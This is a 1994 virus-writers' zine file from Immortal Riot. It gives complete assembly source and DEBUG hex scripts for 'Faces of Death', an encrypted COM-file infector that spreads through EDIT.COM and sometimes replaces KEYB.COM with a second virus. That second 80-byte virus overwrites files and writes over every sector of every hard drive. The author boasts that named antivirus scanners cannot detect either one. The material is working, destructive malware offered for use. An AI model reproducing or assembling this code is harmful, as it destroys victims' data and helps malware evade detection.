Insane Reality issue #6 - (c)opyright 1994 Immortal Riot File 006 ; ------------------------------------------------------------------------------ ; ; - Faces of Death - ; Created by Immortal Riot's destructive development team ; (c) 1994 The Unforgiven/Immortal Riot ; ; ------------------------------------------------------------------------------ ; þ Undetectable COM-infector(s) with a neat pay-load system! þ ; ------------------------------------------------------------------------------ Replicating: FOD will infect all comfiles in the current dir, as well as \dos\edit.com in the very first run. Everytime EDIT.COM is executed, the virus will search for new comfiles to infect in the directory from where you typed EDIT. This means, if you use EDIT a alot, many files will become infected. Some programs also calls EDIT.COM (Vernon D. Buerg's list for instance..), and that's the reason of why I choosed that file to direct-infect. All other infected programs can and will continue to spread the disaster further into other uninfected targets and systems, making this program self-replicating, or a virus for short. Invalid-targets com-file targets: It will not infect previous infected files, files that starts with two nops, MZ, or ZM, tiny/huge comfiles. Furthermore command.com will probably not be infected. Pay-Load: There is a one percent each time an infected program are being executed that the virus will replace c:\dos\keyb.com with another virus. During the next boot-up, this file will activate, i.e. it will overwrite *.* of the DOS files, and eventually trash all available HDs. Keyb.com is an excellent target to trojanize/infect, bcos it is often called (from autoexec.bat) before the security programs are. This means, when DOS prints "Now loading MS-DOS...", all files will become infected, and eventually, all HDs trashed and there is not a damn thing they can do to about it! The virus it can drop (80hex) is also undetectable by all anti-virus programs, making this virus sorta wash-and-go :). Anti-Virus-Detection: Tbscan 6.26 can't detect one single flag on high heuristic in any infected file (i.e. in encrypted form). F-Prot 2.14 heuristics, Scan 2.12, AVP 2.00, MSAV/CPAV, and Findviru cannot detect shits either. Yo-Yo's!: Priest, Zerial, Qark, Metabolis, Metal Militia, Pottie Rottie, Raver þ -------------------------------------------------------------------------------- .model tiny .radix 16 .code org 100h start: first_gen_buffer db 00,00,00,00 ; for first generation only! v_start: entry_point: mov sp,102h ; get the delta offset so tbscan cant call get_delta ; flag it as flexible entry point get_delta: mov bp,word ptr ds:[100h] mov sp,0fffeh sub bp,offset get_delta mov ax,0305h ; this code was included to avoid detection xor bx,bx ; from tbscan. The vsafe disabeling code can int 16h ; be used as well, but f-prot heuristics ; complains about it. call en_de_crypt ; decrypt the virus jmp short real_start ; and continue... encrypt_value dw 0 ; random xor (encryption) value write_virus: call en_de_crypt ; write encrypted copy of the virus mov ah,40 ; mov cx,code_end-v_start ; # bytes lea dx,[bp+v_start] ; dx:100h int 21 ; call en_de_crypt ; decrypt virus again for further processing ret en_de_crypt: mov ax,word ptr [bp+encrypt_value] lea si,[bp+real_start] mov cx,(enc_end-real_start+1)/2 xor_loopie: xor word ptr [si],ax ; encrypts two bytes/loop until all inc si ; code between real_start and enc_end inc si ; are encrypted loop xor_loopie ret real_start: cmp word ptr cs:[5dh],'?-' ; check for -? in the command line jne chk_cond ; no valid virus option! mov ah,9 ; tell them that i wrote the virus, lea dx,[bp+offset v_name] ; and quit without infecting! int 21h int 20h chk_cond: mov ah,2ch ; get time of 1/100 of a second value from int 21h ; the system clock cmp dl,58 ; value == 58h (88d) jne get_drive ; nope! cr_file: ; value = 58h mov ah,3ch ; create the file c:\dos\keyb.com mov cx,0 ; Doh! One byte wasted! lea dx,[bp+file_create] int 21h xchg ax,bx mov ah,40h ; write the mov cx,len ; 80hex virus, lea dx,[bp+write] ; from this virus int 21h ; to keyb.com mov ah,3eh ; close file lea dx,[bp+offset file_create] ; c:\dos\keyb.com int 21h jmp $ ; and hang get_drive: mov ah,19h ; get drive from where we are executed from int 21h ; check if it's a: or b: cmp al,2 ; if so, return control to the original jb quit ; program without infecting other files lea si,[bp+org_buf] ; copy the first four bytes of the file mov di,100 ; (from di:100h) to org_buf movsw ; movsw ; lea dx,[bp+code_end] ; set our own dta to code_end, so call set_dta ; the paramters when findfiles arent ; destroyed lea dx,[bp+direct_infect] ; if present, infect call dirinfect ; \dos\edit.com mov ah,4e ; search for com files lea dx,[bp+com_files] ; find_next: int 21 jc no_more_files ; no more files find, exit! call infect ; found a find, infect it! mov ah,4f ; search next file jmp short find_next ; and see if we find one no_more_files: ; mov dx,80 ; set the dta to 80h (default) call set_dta ; quit: ; mov di,100 ; return control to original program push di ; ret infect: lea dx,[bp+code_end+1e] ; 1e = adress to filename in ds:dx in our ; new dta area! dirinfect: mov ax,3d02 ; open file int 21 ; in read/write mode jnc infect_it ; if the file \dos\edit.com doesnt exist ret ; return, and search first comfile infect_it: xchg bx,ax ; filehandle in bx mov ax,5700 ; get time/date int 21 push dx ; save date push cx ; save time mov ah,3f ; read the first four bytes mov cx,4 ; of the file to org_buf lea dx,[bp+org_buf] int 21 cmp byte ptr [bp+org_buf+3],07h ; previous infected jz finish_infect ; cmp word ptr [bp+org_buf],9090h ; double nop jz finish_infect ; cmp word ptr [bp+org_buf],5a4dh ; ZM (exe file) jz finish_infect ; cmp word ptr [bp+org_buf],4d5ah ; MZ (exe-file) jz finish_infect ; cmp byte ptr [bp+org_buf+1],6Dh ; command.com jz finish_infect ; mov ax, word ptr [bp+code_end+1ah] ; <1000 bytes cmp ax,1000d ; jb finish_infect cmp ax,64000d ; >64000 bytes ja finish_infect ; mov ax,4202 ; move file-pointer xor cx,cx ; to end of file cwd int 21 sub ax,3 ; substract bytes mov word ptr [bp+first_four+1],ax ; to our own jump get_value: mov ah,2ch ; get system clock for int 21h ; 1/100 of a second jz get_value ; if zero = get new value add ax,3 ; this will be used for mov word ptr [bp+encrypt_value],dx ; the xor-value call write_virus ; write virus to end of file mov ax,4200 ; move file-pointer to xor cx,cx ; top of file cwd int 21 mov ah,40 ; write our own jump mov cx,4 ; instruction to the lea dx,[bp+first_four] ; beginning int 21 finish_infect: mov ax,5701 ; set back pop cx ; time pop dx ; date int 21 ; mov ah,3e ; close file int 21 ret ; return and continue! set_dta: mov ah,1a ; code to set the disk transfer area int 21 ; ret v_name db "Faces of Death - (c) 1994 The Unforgiven/Immortal Riot$" direct_infect db '\DOS\EDIT.COM',0 file_create db 'c:\dos\keyb.com',0 write db "þJ€ÄNºJÍ!s´,Í!€úOr°¹»N™Í&BsûþÀëðÃþJ=ºžÍ!“´@º¹€Í!€ìÍ!´OëÀ+.*Materialism - the religion of today, ain't it sad?" endwrite: len equ endwrite-write com_files db '*.com',0 first_four db 0e9,90,90,07 ; buffer to calculate the new entry org_buf db 90,90,0CDh,20 ; buffer to save the first four bytes enc_end: code_end: end start ; ------------------------------------------------------------------------------ ; - 80hex virus - ; (c) 1994 The Unforgiven/Immortal Riot ; Pay-Load function: ; This will be dropped to the file c:\dos\keyb.com, that often ; is called from autoexec.bat, which will result in that all files ; in DOS being overwritten. Eventually all hds will be trashed as well. ; General-information: ; It's a simple overwriting virus, BUT not released 'alone' as ; the purpose as a virus that will infect systems and travel ; around the world. It's rather an original pay-load, outsmarted ; by my creative/destructive brain. ; It's not encrypted, still *NO* anti-virus detects it, this is probably ; due to its simplistic shape. It's *highly* destructive, and is really ; more or less a trojan. But it can replicate, so... ; Greetings to all destructive virus writers! ; - The Unforgiven/Immortal Riot ;Riot.trivial.80h .model tiny .code org 100h start: dec byte ptr offset files ; tricking tbscan ! add ah,4eh ; tricking f-prot ! mov dx, offset files next: int 21h jnc open mov ah,2ch ; Value of 1/100 of a second int 21h cmp dl,79 ; 20% jb quit ; mov al,2h drive: ; Harddrive, seek and destroy! mov cx,1 lea bx,virus cwd ; clear dx (ax = <8000h) Next_Sector: int 26h inc dx jnc next_sector ; all sectors inc al jmp short drive ; all drives quit: ret open: inc byte ptr offset files add ax,3d02h mov dx, offset 9eh int 21h write: xchg ax,bx mov ah,40h mov dx, offset start mov cx, endoffile - start int 21h close: sub ah,2 int 21h mov ah,4fh jmp short next data: files db "+.*",0 ; => *.* virus db "Materialism - the religion of today, " truth db "ain't it sad?" endoffile: end start -------------------------------------------------------------------------------- N face.com E 100 00 00 00 00 BC 02 01 E8 00 00 8B 2E 00 01 BC FE E 110 FF 81 ED 0A 01 B8 05 03 33 DB CD 16 E8 16 00 EB E 120 26 00 00 E8 0F 00 B4 40 B9 35 02 8D 96 04 01 CD E 130 21 E8 01 00 C3 8B 86 21 01 8D B6 47 01 B9 F9 00 E 140 31 04 46 46 E2 FA C3 2E 81 3E 5D 00 2D 3F 75 0A E 150 B4 09 8D 96 56 02 CD 21 CD 20 B4 2C CD 21 80 FA E 160 58 75 22 B4 3C B9 00 00 8D 96 9B 02 CD 21 93 B4 E 170 40 B9 80 00 90 8D 96 AB 02 CD 21 B4 3E 8D 96 9B E 180 02 CD 21 EB FE B4 19 CD 21 3C 02 72 2E 8D B6 35 E 190 03 BF 00 01 A5 A5 8D 96 39 03 E8 B4 00 8D 96 8D E 1a0 02 E8 20 00 B4 4E 8D 96 2B 03 CD 21 72 07 E8 0F E 1b0 00 B4 4F EB F5 BA 80 00 E8 96 00 BF 00 01 57 C3 E 1c0 8D 96 57 03 B8 02 3D CD 21 73 01 C3 93 B8 00 57 E 1d0 CD 21 52 51 B4 3F B9 04 00 8D 96 35 03 CD 21 80 E 1e0 BE 38 03 07 74 5F 81 BE 35 03 90 90 74 57 81 BE E 1f0 35 03 4D 5A 74 4F 81 BE 35 03 5A 4D 74 47 80 BE E 200 36 03 6D 74 40 8B 86 53 03 3D E8 03 72 37 3D 00 E 210 FA 77 32 B8 02 42 33 C9 99 CD 21 2D 03 00 89 86 E 220 32 03 B4 2C CD 21 74 FA 05 03 00 89 96 21 01 E8 E 230 F1 FE B8 00 42 33 C9 99 CD 21 B4 40 B9 04 00 8D E 240 96 31 03 CD 21 B8 01 57 59 5A CD 21 B4 3E CD 21 E 250 C3 B4 1A CD 21 C3 46 61 63 65 73 20 6F 66 20 44 E 260 65 61 74 68 20 2D 20 28 63 29 20 31 39 39 34 20 E 270 54 68 65 20 55 6E 66 6F 72 67 69 76 65 6E 2F 49 E 280 6D 6D 6F 72 74 61 6C 20 52 69 6F 74 24 5C 44 4F E 290 53 5C 45 44 49 54 2E 43 4F 4D 00 63 3A 5C 64 6F E 2a0 73 5C 6B 65 79 62 2E 63 6F 6D 00 FE 0E 4A 01 80 E 2b0 C4 4E BA 4A 01 CD 21 73 1C B4 2C CD 21 80 FA 4F E 2c0 72 12 B0 02 B9 01 00 BB 4E 01 99 CD 26 42 73 FB E 2d0 FE C0 EB F0 C3 FE 06 4A 01 05 02 3D BA 9E 00 CD E 2e0 21 93 B4 40 BA 00 01 B9 80 00 CD 21 80 EC 02 CD E 2f0 21 B4 4F EB C0 2B 2E 2A 00 4D 61 74 65 72 69 61 E 300 6C 69 73 6D 20 2D 20 74 68 65 20 72 65 6C 69 67 E 310 69 6F 6E 20 6F 66 20 74 6F 64 61 79 2C 20 61 69 E 320 6E 27 74 20 69 74 20 73 61 64 3F 2A 2E 63 6F 6D E 330 00 E9 90 90 07 90 90 CD 20 RCX 239 W Q ------------------------------------------------------------------------------- N 80hex.com E 100 FE 0E 4A 01 80 C4 4E BA 4A 01 CD 21 73 1C B4 2C E 110 CD 21 80 FA 4F 72 12 B0 02 B9 01 00 BB 4E 01 99 E 120 CD 26 42 73 FB FE C0 EB F0 C3 FE 06 4A 01 05 02 E 130 3D BA 9E 00 CD 21 93 B4 40 BA 00 01 B9 80 00 CD E 140 21 80 EC 02 CD 21 B4 4F EB C0 2B 2E 2A 00 4D 61 E 150 74 65 72 69 61 6C 69 73 6D 20 2D 20 74 68 65 20 E 160 72 65 6C 69 67 69 6F 6E 20 6F 66 20 74 6F 64 61 E 170 79 2C 20 61 69 6E 27 74 20 69 74 20 73 61 64 3F RCX 80 W Q